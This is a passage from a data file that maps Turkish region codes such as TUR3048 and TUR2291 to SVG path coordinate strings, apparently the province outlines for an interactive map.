1.8-1.3 2.4-2.6 0.3-2.6 0-2-1.3-1.7-1.8-2.4-0.8-2.4 0.7-2.2-0.1-2.1-0.6-2.3 0.4 1.4-4 0.8-3.3-0.6-3.7-0.4-0.9-1.5-1.2-3.4-0.7-1.1 0.1-1.6-4.8 0-5.1 3.5-8.5 3-6.8 2.4-4.1 4.9-0.3 4 0z\",\r\n    TUR3048: \"M959.4 191.2l0.2 0.7 0.3 1.4 0.6 1.3-0.1 1 0 0.6 0.2 0.6 0.6 1.3 0.1 0.6-0.4 1.2 0.1 0.6 1.3 1 2.3 1.3 2.1 1.4 0.4 1.6-1 2.1-0.3 1 0.5 2.7-0.5 0.8-0.9 0.7-0.7 1.3 0.4 0.9 0.3 1 0.3 0.5 0.8 0.8 0 1.2 0.9 2.5 0.8 1 0.8 0.8 2.8 1.3 0.2 2-1.4 4.9-0.2 1.3 0.1 0.8 0.2 0.8 0.3 1.2-0.2 0.5-0.5 0.5-0.1 0.4 0.6 0.3 1 0.3 0.7 0.7 0.4 1.1 0 1.4-0.2 2.7 0.4 3.4 0 1.1-0.7 2.7 0 0.8 0.2 1.7-0.2 1.7 0.1 0.6 1.3 0.7 2.6 0.4 1.7-1 0.7-0.1 0.8 0.3 0.7 0.6 0.6 0.9 0.4 1.1 0.1 1-1.2 1.7-1.9 1.5-1.5 1.7 0.3 3.2-0.2 1.3-0.3 1.3-0.4 0.9-0.4 0.6-0.9 0.4-0.4 0.3-0.1 0.6 0.4 1.3-0.3 0.4-1 0.5-0.6 0.5-0.5 0.9-0.5 1.3-0.4 1.1-1.3 1.4-0.9 1.8-0.3 0.8-0.1 0.9 0.2 0.9 0.1 0.8-1 1.4-0.1 0.3-4.6-0.6-3.8 0.8-2.1 3.7-1.3 3.6-2.9 1.7-3.3 0.7-3.4 0-2.1-0.9-2.2-0.3-1.5 0.6-1.5 0.8-6.9 1.1-7 0.1-2.6 0.3-2.5 0.1-1.3-0.3-4-1.7-4.4-0.6-4.2 2.3-2.1-4.9 0.6-1.9 0.7-1.6 0.2-3.8 0.7-2.7 0.2-2.8-0.3-2.7 0.1-2.7-0.5-4.7-3.6-1.4-4.2-0.8-4.1 0.2-2.8-0.9-0.9-3.4 0.5-2.3-0.1-1.7-0.2-0.9-1.9-4.2-0.3-1.4 0.5-2.9 0.9-0.9 5.6-3.2 3.3-2.3 1.1-1.9 0.9-2 4.8-7.2 2.8-3 3.8-3 1.5-4.9-2.1-3.3-6.1-3.7-1.6-3.4-0.1-5.2 6.1-2.4 1.3-1.4 0.1-2.4 0.3-2.3-0.3-2.1-2.1-0.8-1.9-1.2 0.4-2 1.2-0.5 3.1-0.6 1.8-0.6 1.9-2.5 2.3-1.8 4 0.3 3.6 1.6 3 3.2 2.4 1.5 4.5 0.8 1.8 0.1 1.3-1.4 1.5-1.1 2-0.3 2 0.3 2.5 0.9 3.1 0.3 0.9 0.3 1.9 0.4 7.4-2z\",\r\n    TUR2239: \"M20.6 156.8l0.8 0.2 0.3 0.3 0.9-0.4 0.3 0.6-0.1 2.4-0.3 1-0.9-0.1-1.7-1.1-1.5-0.8-0.7-0.5-0.3-0.8 0.4-0.6 1-0.2 1.8 0z m-4-21.2l0.5 0.2 1-0.2 0.8-0.7 0.3 0 0 1.4-1.2 0.7-1.1 0.4-3.5 0.5-2.3 1-4.7 0.8-1.1-0.1-1.3-0.5-0.6-0.3-0.3-0.4-2.1-0.7 0-0.4 1.2-2 1.7-1.8 2.1-1.3 3.5-0.7 4.5-1.7 0.7-0.1 0.6 0.1 1.1 1.3 0.7 0.1 0 0.5-0.2 1.4 0 0.9 0.2 0.5-0.5 1.1z m83.9-10.9l0.2 0.7-0.6 3-2.5 1.5-3.6 3.8-0.8 0.3-0.6 0.5 1 2.1 2.1 0.8 0.9 0.2 0.2 0.4-0.3 1.3-0.7 2.2-0.2 1.9-0.6 1.5-0.4 0.5-0.5 1.2 0.9 1.4 0.9 0.8-0.3 2.7-0.9 2.8-1.1 2.6-2.1 1.5-2.2 1-2.1 1.5-2.2 0.9-3.8-1.3-3.9-0.7-1.4 0.8-1.6-0.2-2.5 0-2.2 1.8-3.7 1.6-2 1.6-2.2 0.8-4.7-0.6-2.1 0.4-1.7 5.3 0.1 5.5-10.9 2-1.2 0.5-0.5 0.6-0.6 0-2.3 1.3-0.4 0.3-0.6 0-2.7-0.5-0.6 0.1-0.7 0.3-0.5 0.1-0.7 1.1-1-0.6-4.1 1-2.1 0-2-1-0.2-1.5 1.3-3.5 0.8-3.4 2-1.9 0.4-1.6 0.4-3.7-0.2-0.7-1-1.9-0.2-0.9 0-0.6 0.5-0.4 0.2-0.4 0-1.6 0.2-1.8-0.1-0.6-0.8-0.2 0.3-0.7 0.7-3.4-0.3-1.8 0-0.6 0.1-0.6 0.5-0.9 0.3-1.2 1.1-1.9 0.5-0.5 2.7 0.9 0.9-0.5 1.7-0.8 0.6-0.3 2.2-2.3 0.4-0.7 0.2-0.6 0-0.9 0.3-0.7-0.1-0.5 0.8-0.1 0.5-0.3 0.3-0.8 0.2-1.3 0-1.3-0.4-1 0.4-1 0.2-0.4 1-0.1 0.8-0.1 1.3-0.7 1.8-0.4 0.9-0.9 2.3-3.1 0.5-0.3 1.2-0.5 0.6-0.5 5.6-6.9 1.1-0.9 2.1-0.1 4.5 0.4 1.8-0.5 0.6 0.2 1.4 0.8 2.9 0.2 1.2-0.2 1.4-1.2 1.3-1.6 1.6-1.3 2.4-0.1 1.8 0.3 2 0.1 1.2-0.3 1.7-1.1 0.8 0 0.9 0.6 0.5 1 0.8 2.1-0.7 0.5-0.6-0.3-0.5 0.3 2.3 2.5 2.9 1.9 3.1 1.4 3.7 0.9 1.4 0 0.6-0.1 0.5-0.4z m-31.7-16.8l-0.7 0.1-2 0.6-3 1.9-0.8 0.8-0.9 0.6-3.3 0.5-0.9 0.6-1.7 1.4-0.7 0.3-0.6 0.5-0.5 2-0.5 0.8-1.7 1-0.4 0.5-0.1 1.1-0.3 1.1-0.8 0.9-2.8 2.7-0.4 0.3-1.5 0.3-0.7 0.6-1.1 1.1-0.3 0.5-1.4 1.7-0.9 0.8-1.2 0.7-1.2 0.6-1.1 0.2-0.7 0.6 0.1 1.2 0.7 1.3 0.7 0.6-2.4 2.4-0.8 0.6-2.1 1.2-1.6 1.5-0.6 0.4-2.8 0.9-0.5 0.1-0.5-0.4 0.1-0.8 0.4-0.8 0.3-0.4 0.9-0.6 0.6-1.5 0.4-1.4 0.2-0.7 2.4-3.3 0.6-2.4-0.2-1.9-1-1.5-1.6-1.2 0.6-0.4 0.1-0.5-0.2-0.3-0.7-0.2-0.2-0.3 0.5-0.6 0.7-0.6 0.3-0.1 0.6-0.6 2.7-1 1-0.1 0.8-1.3 2.6-1.7 2.4-2.1 3.1-1.1 2.3-2 1.5-1 1.6-0.7 1.4-0.4 2.5 0.4 0.7-0.4 0.7-0.7 1.1-1.7 0.8-0.9 1.2 0.6 1.6-0.5 1.5-1.3 0.7-1.4-1.6-3.4-0.4-0.6-0.6 0 0.4-4.3 0-0.2 7.6 0.7-0.1 5.5 1.7 5.1z\",\r\n    TUR2238: \"M103.8 114.4l0.5 0.5 0.6 0.1 0 0.6-0.6 0.1-0.7-0.4-0.9-0.2-0.9-0.1-0.8-0.5-0.1-0.8 0.6-0.5 0.4-0.9 0.4-0.6 1.8 0.8 0.1 0.5-0.3 0.6-0.1 0.8z m29.9 4.6l-0.3 0.5-2.5 3.8-1.5 1.3-1.4 1.4 0.4 2.3 1.2 0.4 1 2.2-0.5 1.2-0.7 1.1-0.7 2.6 0.3 1.4 0.9 2.5 1.9 3.1 2.9 2 0.9 1.7 1 4.8 0.9 2.1 13.8 10.2 4.1 0.5 1.2-1.1 1.3-0.7 0.8 1.2-0.2 1.4 0.1 1.8 1 1.7 0.3 0.8 0.6 0.4 1 0.1 0.7 0.5 1.3 2 2.1 0.3 2.4-0.5 2.4 0.1 1.6 0.8 1.2 1.3-1 2-0.3 1.3 0 1.3-0.4 0.9-0.6 0.6-0.7 1.9-0.7 4.8-1.2 2-1.2 1.5-0.4 1-1.6 2.9-1.7 1.2-3.8 1.3-2 1-0.5 2.3 0.3 0.8 0.1 1.7-0.3 0.7-4.6-0.7-4.8 2.5-1.9 0.5-2 0.2-2.2-0.2-2.2 0.4-1.4 1.9-1.9 1.2-2.3 0.4-2.2 1-2.4-0.9-2.6-6-4.3-4.7-0.4-1-0.8-0.4-3.9 1.4-2.1-1 0.6-2.3 1.6-2.8-1.3-2.2-0.8 0.1-1.7 0.3-0.8-0.1-2.1-1.1-2.1-0.1-3.7 0.5-3.7-1.1-2.2-1.8-2.4-1.2-4 2.1-1.5-3-2.3-2.1-2.9-0.6-9.5 6.2-1.6 0.6-1.5 0.9-1 1.4-0.9 1.6-1 1.1-11.2 8.1-0.4-0.2-1.1-0.8-0.7-0.8 0.1-0.7-0.4-1.4-0.3-1.3-0.4-1-0.9-0.5-2.5 0.2-1.2-0.1-1.1-0.5 0.5-0.5 0.3-1.4 0.4-0.7 0.7-0.2 0.5 0.3-0.1 0.4-0.9 0.2 0 0.5 0.6-0.1 0.9 0.6 0-0.6 0.3-0.6 1.1-0.6 0.9-1.4 5.5-4.3-0.7-0.4 0.1-1.3-0.1-0.6 1.9-0.1 0.7-0.3 0.6-0.5-0.5-1 0.8-0.6 3-1 0.2-0.1 0.1-1 0.7-2.5 0-1.5-0.4-0.9-0.8-0.5-1.5-0.2-1.2 0.5-0.9 1-1 0.4-1.3-0.9-7.4 1.3-0.1-5.5 1.7-5.3 2.1-0.4 4.7 0.6 2.2-0.8 2-1.6 3.7-1.6 2.2-1.8 2.5 0 1.6 0.2 1.4-0.8 3.9 0.7 3.8 1.3 2.2-0.9 2.1-1.5 2.2-1 2.1-1.5 1.1-2.6 0.9-2.8 0.3-2.7-0.9-0.8-0.9-1.4 0.5-1.2 0.4-0.5 0.6-1.5 0.2-1.9 0.7-2.2 0.3-1.3-0.2-0.4-0.9-0.2-2.1-0.8-1-2.1 0.6-0.5 0.8-0.3 3.6-3.8 2.5-1.5 0.6-3-0.2-0.7 1.3-0.8 0.8-0.2 1.5 0.3 1.3 0.6 1.2 0.3 1.2-0.8 1.1 0.5 1.5 0.2 1.5-0.4 1.2-1.8 2.8-1.5 0.8-1.2-0.9 0-2.6-0.9-0.8 0.4-0.4 0-0.3-1.3-0.7-0.3-0.3-0.2-0.6-0.9-0.1-1.2-0.2-0.5-0.9-0.1-0.4-0.2-1.7-1.7-0.4-0.6 0-0.5 0.6-0.2 0.5-0.4 0.8-1 0.6-0.3 0.9 0.4 0.5-0.8 1 1.2 0.5 0.3 0.3-0.4 0.5-0.2 8.6 1.4 2.4 0.8 1 1.2-0.9 1.6-4.5 2.3-1.4 1.2 0.2 1.7 1.9 0.6 4.4-0.4 4.4-1.7 5-0.2z m-30.1-18.1l1.4 0.7 0.8-0.3 1.5 0.3 1.3 0.7 0.3 1.2-1 0.7-1.9 0.3-1 0.4-1.8 1.5-1 0.4-1.1-0.5-0.6 0-1-0.5-0.9-0.7 0.2-1.5-0.7-1.1 0.3-0.7 0.7-0.7 0.3 0.2 0.2 0.7 1.3-0.7 1.3-0.4 1.4 0z\",\r\n    TUR3021: \"M447.9 218.9l-0.6 2.7 1.7 6-0.8 3.3-1.8 3.1 0.7 3.3 2.4 1.6 2.6 0.8 2.3-0.5 1.1 0.4 0.4 3-1.6 3.4 0.1 3.2 0.9 0.9 2.1 1.7 1.8 1.8 1.9 1.2-17.2 25.7-3.9-0.6-3.9 0.9-4 1.6-4.1 1-4.1-0.2-8.2 0.6-6.2 1.4-2.2-0.1-2.2-2.1-3.5-4.3-0.8-2.5-0.4-2.8-0.5-0.7-0.7-0.5-1.9-5.1 0.4-5.4 0.8-2.3 0.3-2.5 1.2-3.5 1.9-2.8 0.7-5.3 1.2-2.2 3-3.4 1-1.9 4.5-1.2 4.3-2.5 4.5-1.2 4.7 0.1 2-1 4.3-4.1 0.2-3.9-2.1-5.7 1.8-4.4 0.7 1 2.1 0.4 1.2-0.1 2 1 0.8 2.6 2 1.9 2.6-1.6 1.1-0.3 2.3 0.3 1.1-0.2z\",\r\n    TUR3020: \"M483.3 255.4l3.7 10.2 3 3.2 8.5 0.1 1.4 4.5-0.5 2.8 0.2 2.8 1.1 2.3 0.5 2.4-2.4 1.5-0.2 3.4-0.9 4.1-6.8 6.9-5.1 0.8-2.7-0.8-2.7-0.2-1.6 2.4 0.2 3.3 1.3 3.3 0.4 1.8-0.8 2.8-0.7 0.8-0.9 0.6-1.3 2.1-0.2 1.4 0.1 3.1-3.7-0.9-3.6 1.6-1.6 1-1.8 0.6-3.9 0.1-1.2-2.8-1.9-2.2-1.3-1-2-2.9 0-1.9 0.3-3 0.8-1.7 1.2-1.4 1.2-3.4-0.6-3.8-1.7-2.3-2-2-1.8-3.2-2-2.9-2.4-1.3-2.5-1-1.8-2.7-0.7-3.4 17.2-25.7 3 0.5 4.4-1.4 3.1-0.1 1.4 0.8 2.2 2.2 2.7 0.7 5.4-2.1z\",\r\n    TUR2310: \"M885.4 213.8l-3.8 3.1-4.3 1.6-8.5-0.9-1.8 0.6-1.7 1.2-2.1 0.9-2.2 0.2-1.1 0.8-0.6 3.1-1.1 1-4.6-0.2-1 2.5 1.7 2.6 0.3 2.9-2.2 1.8-3 3.5-3.7 2.1-8.9-0.7-8 3-0.6 0.9-2.9 0.4-2.8 0.9-1.6-0.5-0.7-1.8 0.6-2.7-0.5-2.6-3.5-2.6-2.7-3.5-0.4-1.7-0.6-1.6-1.2-1-0.6-0.2-1.1-1.6-1.1-3.8 1.6-5.2 3.6-4.5 0.7-2.7-0.4-3-1.4-2.6-1-1-1.2-2.1 0.1-2.1 0-1-0.5-1.3-0.3-0.6-0.8-2 0.3-1.5 1.4-2.6 8.4-1.4 4.2 1 1.9 1.3 5.1 5 3 4.3 1.3 1.1 4.4 1.8 4.5 0.2 2.1-1.6 2.1-1.2 6.4-1.1 1.6-1.5 1-1.2 3.6-2.2 1.5-2.5-0.3-3.1 1-3 7.2-3.6 1.9-0.1 2-0.3 1.1-0.4 1.4 4.3 2.2 3.7 1.6 1.5 1.6 1.9 0.9 1.9 1.3 1.2 1.9 2.8-0.3 4.3 0.3 1 0.1 1-0.6 2.6-0.4 3.3 0.2 3.5z\",\r\n    TUR2311: \"M893.7 268.6l-1.5 4.4-0.6 0.8-0.6 0.9 0 2 0.3 2.1-0.2 3-1.6 2.4-2 0.1-3.5-2.5-5.3-3-3.2-2.4-2.4-1-3.6-0.9-3.8-1.6-3.3-2.6-3.1-3.1-3.5-1.6-4.5 1.7-4.5 1.2-5.6-0.5-5.4-2-0.1-1.5 0.2-1.5 0-2.5-0.2-2.4-1.2-3.6-1.8-9-4.5-1.7 0.6-0.9 8-3 8.9 0.7 3.7-2.1 3-3.5 2.2-1.8-0.3-2.9-1.7-2.6 1-2.5 4.6 0.2 1.1-1 0.6-3.1 1.1-0.8 2.2-0.2 2.1-0.9 1.7-1.2 1.8-0.6 8.5 0.9 4.3-1.6 3.8-3.1 2.3-1.4 2.4-0.8 1.9-1.1 1.7-1.4 9.6-2.2 0.1 5.2 1.6 3.4 6.1 3.7 2.1 3.3-1.5 4.9-3.8 3-2.8 3-4.8 7.2-0.9 2-1.1 1.9-3.3 2.3-5.6 3.2-0.9 0.9-0.5 2.9 0.3 1.4 1.9 4.2 0.2 0.9 0.1 1.7-0.5 2.3 0.9 3.4 2.8 0.9z\",\r\n    TUR2230: \"M37.1 251.6l-0.1 0.7-0.5 0-0.8 0.3-0.2-1.3 1.6-0.8 0.3 0.6-0.3 0.5z m20.2-1.8l-0.6 0.4-0.4-0.4-0.1-0.3-1.2-0.6-0.3-0.3 0-2 0.4-1.4-0.1-0.6 0.6 0.1 0.6 0.5 0.4 0.8 0.1 1.8 0.7 0.7 0.1 0.5-0.2 0.8z m94.8 23.8l-8.2 3-2.1 0.3-2.1 0.6-1.8 1.1-1.8 0.7-10.1 0.1-12.1 3.3-12.8-1-2.7 0.4-6.3 4.2-4.2 1.7-3.6 0 0.2-0.8 0-0.6-0.2-0.6 0.7-0.7-0.4-1.4-1.4-2.5-1.4 0.5-1.9 0-1.9-0.3-1.2-0.6-0.8-1.2-1.4-0.3-0.3-0.2-0.2-1.3-0.5-0.4-1.5-0.2-2.7-1.1-1.4-0.1-1.6 0.3-1.5 0.6-0.4 1-0.4 0.2-0.5-0.3-1.1-2.4 0.2-0.8 0-1-0.3-1-0.3-0.9-0.5-0.9-1.2-1.1-0.5-0.7-0.9 0.5-0.2-0.8 0.1-2-0.7-0.6-0.8 0-0.9 0.4-1 0.2-3.3 0-0.5 0.2-0.7 4.3-0.4-0.4-0.3 0 0.2 1 0 0.8-0.3 0.7-0.6 0.3-0.4-0.3-0.6-1.7-0.5-0.8 0 1.4-0.5 0.1-0.7-0.5-1-1.1-0.4-0.6-0.1-0.6 0.2-1-1.4 0.4-1.3-1.1-1.3-1.4-1.3-0.6 0.4 1.4-0.4 0-0.3-0.4-1.1-1.2 0.2-1.3 0-0.6-0.2-0.6-0.4 0-0.4 1.8-1.1 0.4-1.3-0.4-1.7-1.5-0.5-0.3-2.7-0.8-0.1-0.5 0.3-1 1.4 0.6 0.6-0.9 0.5-1.2 1.1-0.3 0-0.5-1-0.7-0.1-1.2 0.4-0.7 0.7 0.8 0.2-0.9 0.5-0.4 0.2 0.8 0 0.7-0.1 0.6-0.5 0.6 0.6 0.3 1.1 0.2 0.2 0.6 0.3 0.2 0.8 0.1 0.7-0.2 0.4-0.4-0.5-0.8 0-0.5 0.9 0.6 0.9-0.1 0.6-0.3 2.5-1.7 0-1.3-0.4-1.4-0.9-0.8 0-0.5 1.3 0.7 0.7 0.7 0.4-0.1 0.8-1.7-0.7-0.5-1.3-1.1-1.1-0.4-0.7-0.7-0.5-0.1-0.4 0.3-0.5 0.9-0.3 0.2-1 0 0-0.3 0.5-0.7 0.3-1.3-0.2-0.8-1.3-1.9-0.1-0.8-0.6-2-0.1-0.9-0.6-2.5 0.2-1.9 0.2-0.8 0.5-0.3 0.8-0.1 1.2-0.6 0.5-0.2 1.4 0.1 1.3 0.4 1.2 0.5 0.9 0.8 1.8 2 0.8 1.2 0.3 1 1.2 1.9 1.3 1.8 1.1 1 0.3 0.8 0.1 0.7 0 1.3 0.3 0.7-0.7 0.4-0.5-0.4-0.5-0.1-0.6 0.2-0.6 0.3 0.9 0.5 0 0.6-0.5 0.8-0.4 0.9 1.3 0.2 0.5 0.7 0.3 1 0.6 1.1 0.9 3 0.8 1.5 1.2-0.4 0.2-0.9-0.3-0.6-0.8-0.6-0.4-2.7 0.3-1.2 0.6-1.1 0.8-0.7 0.8 0.2 0.4-0.4 0.6 0.7 0.6 1.2 0.9 2.7 1.1-0.5 0.4 0.8 0.8-0.1 0.9-0.4 0.9-0.3 4.2-0.4 2.5-1.3 1.1-0.3 1-0.8 0.5 0.1 1 0.3 0.6-0.4 0.4 0 1.4 0.7 1.2-0.8 1.2-1.3 1.5-0.8 0-0.5-0.5-0.4-0.6 0.4-0.3-0.5-1 0.5-1.8-0.2-0.4 0.2-1.4-0.6-1.4 0-3.2 1.4-1.1 0.5 0.3-0.8-0.9-0.7-1.5-2.5-0.8-0.5-1.3-0.4-0.5-0.3-1.1-0.9 0.1-0.4 0.9 0.7 1.4 0.9 0.8 0 0-0.5-0.6-0.7-0.6-0.7-0.8-0.5-0.8-0.4 0.2-0.7 0.3-1.7 0.2-0.8-0.8-0.7-0.4 0.2-0.6 0.5-1.1 0 0.4-0.9-1.1-0.4-0.7-0.1-0.7 0 0.3-1.3-0.6 0-0.5-0.3-1-0.7 0.8-0.7 1-0.2-1-1.6-0.4-0.8-0.4-1.2 1-0.7 2.7-0.6 1.5-1.1 0.7 0.6 1 0.1 1.2 0.5 0.8 0.3 0.8-0.1-0.4-0.9 1-0.8 0.4-0.1 0.4 0.5 0.2-1.1-0.2-1.2-0.3 0.5-1.1-1.9-0.4-0.4 2.1-1 0.4 1.5 0.8 0.1 0.6-0.8-0.7-1.7 0.9-0.3 0.8-0.4 0.7-0.6 0.5-0.5 1 0.7 1.2-0.7 0.4-1.1-1.2-0.3 0.9-1.8 0-0.7-0.9-0.7-0.9 0.8-0.5 0.4-0.6 0.1-1 0-0.3-0.2-0.5-0.9-0.3-0.2-0.6 0.2-0.5 0.3-0.3 0.1-0.5-0.6-0.6 0.5-1.8 1.1-0.7 0.2-0.5-0.3-0.8-1.2-0.8-0.3-1-0.7-0.5-1.6 0.1-1.6 0.8-1.2 0-0.4-1.1 0 0.7-0.8 1.2-0.9 1.3-0.8 1-0.3 0.5-0.6-0.4-1.3-1.2-2-1.5-1.9-0.7-0.5-1.6-0.9 11.2-8.1 1-1.1 0.9-1.6 1-1.4 1.5-0.9 1.6-0.6 9.5-6.2 2.9 0.6 2.3 2.1 1.5 3 2 5.2 1.7 8.1 0.9 2.4 1.9 3.6-0.4 3.6-1.4 1.6-3.4 2.9-3.3 1.3-2.9 2-0.6 2.4-0.3 2.6-0.9 2.2-1.6 1.7-1.5 2.4-0.2 1.4 1.4 1.5 0.8 0.3 1.2 1.6 1.4 4.6 3.1 2.6 3.7 0.4 5.8-0.1 1.1 0.1 1.6 1.6 0.8 3.7 3.7 2.5 4 1.9 0.5 1 0.6 2.1 0.4 1 2.2 2 2.6-0.6 1.3-2.2 0.8-2.1 2.5 0.1 2.5 1.2 1.6 0 1.6-0.5 2.1 2.4 1.4 3.3 5.1-0.8 2-0.6 1.4 0.2 1 1.2 1.8 0.6 1.2 0.1 2.4 0.6 1.4 1.9 2.2 6.8 2.3 3.5z\",\r\n    TUR2291: \"M481.9 58.9l2.7 4.9 0.7 2.5 0.3 2.7 0.8 2.6 4-0.5 2 0.5 0.5 2-0.8 1.7-1.1 1.4-0.7 2.1-0.1 6.9-0.8 4.5 0.5 1.9 2.1 4.5 1.4 2.5 1.6 1 8.7 1.5 3.9 2.4 1.8 0.3 0.9 0.4 1.3 3.1 0 2.6-1.2 4.9-4.5 6.9-0.5 1.6 0 1.8-0.6 4.7-2.1 0.8-5 0.4-0.5 3 0.7 0.8-0.2 1.2-0.6 1.5-0.1 1.3-1.4 1.9-4.1 2.4-2.4 0.3-4.4-1.3-7.8 3.8-4.2 0.3-2.1-0.2-3.1 1.2-8-1.5-5.1 1.7-4.9 2.3-8.2 1-3 1.4 0-3.5 1.4-2.8 1-1.7 0.2-2.2-0.7-2-0.2-1.5-1-1.1-1.2-0.2-1.3-1.3-2.2-4.9-0.6-3.2 4.2-2.4 1-0.2 1-0.5 1.5-2.6 1.2-2.8 0.7-0.5 0.1-1.8-0.3-1.8-0.6-1.8-0.8-1.7-1.3-2.1-0.7-2.6 0.2-2.5-0.4-2.4-1.3-2.5-0.3-3 1.1-2.7 0.6-2.7-2.6-4.3 4.6-1 7.4-3.1 1.2-3.4-1.7-1.9-1.1-0.4-1-2.6 0.6-1.4 1.8-2.2 1.8-4.5 2.4-2.2 1.2-1.5 1.5-3.8 1.8-2.6 2.7-0.6 1.4 1.7 1.9-0.1 1.2 0.2 0.8 1 1.8 0.3 1.7-0.4 1.6 0.4 1.3 1 0.5 1 0.9 0.6 6 1.9 1.1-1.4 0.9-0.8 0.4-0.9 0.1-1.2 0.1-0.5z\",\r\n    TUR2290: \"M563 86.6l-1.5 0.8 0 0.5 0.4 0 0 0.5-0.7 0.9 0.6 1.2 1.1 1 0.8 0.6 0.9 0.4 1 2.7-1.8 2.7-0.9 2.3 0 2.5-2.3 3.3-4.2 0.9-0.4 3.5-0.8 0.5-0.7 0.7-4.3 2.8-3.2 1.6-1-0.1-0.9-0.7-1-0.5-1.1-0.3-1.5-0.8-1.3-1.1-4.2-1.1-4.3 0.3-1.4 1.7-2.3 5.2-1.6 2.7-1.3 2-1.6 1.8-1.8 0.8-1 0.3-2.8 1.2-1.5 1.6-2.1 4.4-2.6-0.8-2.7 0.2-2.3-0.2-1-0.7-0.4-1.4-0.5-0.2 0.6-4.7 0-1.8 0.5-1.6 4.5-6.9 1.2-4.9 0-2.6-1.3-3.1-0.9-0.4-1.8-0.3-3.9-2.4-8.7-1.5-1.6-1-1.4-2.5-2.1-4.5-0.5-1.9 0.8-4.5 0.1-6.9 0.7-2.1 1.1-1.4 0.8-1.7-0.5-2 16.2 4.6 3.2-0.6 1.7 1 7.5 5.8 1.8 3.1 1.8 0.5 3.9-0.3 2 0.4 6.9 0.1 4.1 2 2.2-0.5 1.9-1.7 2.3-1.5 1.6-2.9 1-3.1 2-1.3 1.9 0.7 1.5 1.6 0.6 1.6 0.9 1.4 5.6 4.1z\",\r\n    TUR2293: \"M650.1 80.5l-0.1 0.3 0.2 2.4-0.8 2.1-1.1 1.3-0.9 1.7 0 2.2 0.9 1.9 0.3 2.3-0.3 2.4 0.2 2.3-0.2 2.3-0.7 1.3-0.2 1.9 5 5.6-1.5 1.3-1.8 0.8-2.4 0.3-2.1 0.5-0.6 0.8-0.1 2 0.5 0.8-0.2 1.2-1.1 0.7-4.3-0.2-1.9 1.4-1.6 2.1-1.5 1.2-1.8 0.2-4-3.2-2.9-5.6-0.9-4.2-1.7-3.3-7.1-0.4-11.9-8.4-3.5-0.3-3.6 0.5-3.7-0.3-3.5-1.4-2.6-1.7-4.4-1.5-2.9-1.8-2.3-0.5-0.7-0.5-0.6-2 0.9-1.9 1.1-0.3 1.1-0.5 2.2-0.2 2.1-0.7 1.9-1.1 0.8-0.6 2-2.3 4.2-2.3 2.2-4.3 2.9-3.2 2.8-3.7 0-0.4 5.8-0.1 1.9 0.5 1.2 1.2 0.6 0.3 1.1 0.3 1.2 0.2 0.9 0.2 1.3 1.5 0.9 0.7 2.1 0.7 0.2 0.3 1.2 1.4 1.1 0.4 2-0.3 0.9 0.3 0.3-0.4 0.7-0.3 0.4-0.2 0.4-0.6 0.7-1.8 0.6-1.2 0.8-1.1 0.8-0.9 1-0.7 0.4 1.2 0.9 0.6 1 0 0.9-0.8 0.3 0.5 1.4-0.2 0 4.3 1 1.2 2.6 1.3 0.8 0.6 0.5 0.7 0.9 1.6 2-0.9 2.5 0.3 6.3 2.1 0.6 0.1z\",\r\n    TUR2292: \"M703.8 93.4l-6.3 0.8-0.4 0.8-0.2 1-1 0.5-1.3 0.4-1.5 1.3-1.6 1.1-0.7 1.7 0.7 2.2-1 1.8-1.6 1.6-0.5 0.8-0.1 0.5-0.4 3.1 0.1 2.5 1.5 1.7 6.1 1.5 1.5 1.2 1.4 1.5 1.2 0.4-0.3 2.5-1.6 1.2-5.2 3-1.2 1.4 0 2.2 0.2 2.3-0.2 2.5 0.4 2.4 1.5 1.8-0.5 2.3-2.1 1-4.6 0.3-2.3-0.2-5.2-2.6-5.5-1.7-5.3 1.3-3.2-2-3.2-2.4-2.9-1.5-1.9-2.9 0.1-3.9-4.3-16.3-5-5.6 0.2-1.9 0.7-1.3 0.2-2.3-0.2-2.3 0.3-2.4-0.3-2.3-0.9-1.9 0-2.2 0.9-1.7 1.1-1.3 0.8-2.1-0.2-2.4 0.1-0.3 2.4 0.5 2.1 0.7 1.2 0 2.3-0.6 1 0.2 2.3 2 1 0 2-0.6 2 0.6 1.3 0.1 0.6-0.5 4-0.2 0.8-0.6 1.9-1.9 0.7-0.4 1.6-0.5 0.7 0.1 0.3 0.2 1.2 1.6 0.5-0.3 1 0 0.5-0.1 1.4-1.3 0.6-0.1 1.5-1.9 1.2-0.4 3.6-0.8 0.9-0.5 0.8-0.8 1-0.3 5.9-0.1 4.2-0.9 1.4-1.1-1.5 8.4-0.1 3.5 0.4 6.3 1 2.6z\",\r\n    TUR2295: \"M683.8 142.5l-0.1 3.5-1.1 2.6-2.4 0-2.4-0.4-2.7 0.6-2.5 1.8-2.5-0.4-2.4-1.9-2.4 1.3-1.9 5.7 0.4 2.1 3.6-0.1 3.8-0.9 1.1 1.3-0.5 1.8-1.1 0.3-1-0.1-2 1.1-1.3 2.2-2.5 3.5-0.6 7-1.2 2.4 0.6 2.5 1.8 1.8 1.7 1.1 1.2 1.7-0.4 1-1.9 1.2-1.5 1.7-0.6 0.1 0.3 0.8 0 1.1 0.1 2.3 0.6 1.9 0.3 2.1-0.2 1.1-0.1 1.3 0.6 2.2-0.4 2.2-1.2 1.8-4.1 1.4-3.7 2.9-3.4 1-3.5-0.5-1.9 0.3-1.7 0.8-4.1 0.1-1.9 0.9-1.9 1.3-2 0.8-1.8 1.3-4.4 0.9-4.4-2.2-2.3 0.6-1.1 2.6 0.5 3.2 0.9 3 0.6 1.4 0.3 1.5-0.8 2.5-3.7 4-2.3 1.5-1.1 0.4-2.7 3.1-2.6 2.5-3.1 1.4-11.7 1-1.3-0.6-1.3-0.9-6.8-0.9-6.9 1.7 0.2-2.8 1.2-2.2 0.4-1 0.2-1.1 2.1-6.1 1.4-5.3 1-2.5 1.2-2.5 2.2-6.3-1.9-6-4.2-2.2-4.4-0.9-4.9 0-4.7 1.6-2.6-0.9-2.6-2-8.6-1.2-4 1.4-5.1-0.7-5-3.6-1.7-0.3-1.7-0.7-0.4-0.5-0.7-1.4-0.4-0.7-2.6-1.3-2.7-0.2 1.9-2.3 2.4-1.8 1.7-2.2 1.2-2.5 1.6-2.5 1.8-2.2 4.5-3.5 3.8-3.8 1.6-5.6-0.2-1.6-0.5-1.4-1.8-1-2.5-4.5-1.5-5 12.2-2.5 8.6-0.4 7.7-3 1.6-1.7 1.1-2.6 1-4.1 1.4-4 1.9-1.1 2-0.6 6 0.8 1.9-0.8 6.8-1.8 4.8-0.7 4.4 0.3 4.4-0.7 1.9-1 1.8-1.5 0.7-0.2 0.8 0 2-0.5 1.8-0.8 3.2-4.4 2.6-5.4 2.9 5.6 4 3.2 1.8-0.2 1.5-1.2 1.6-2.1 1.9-1.4 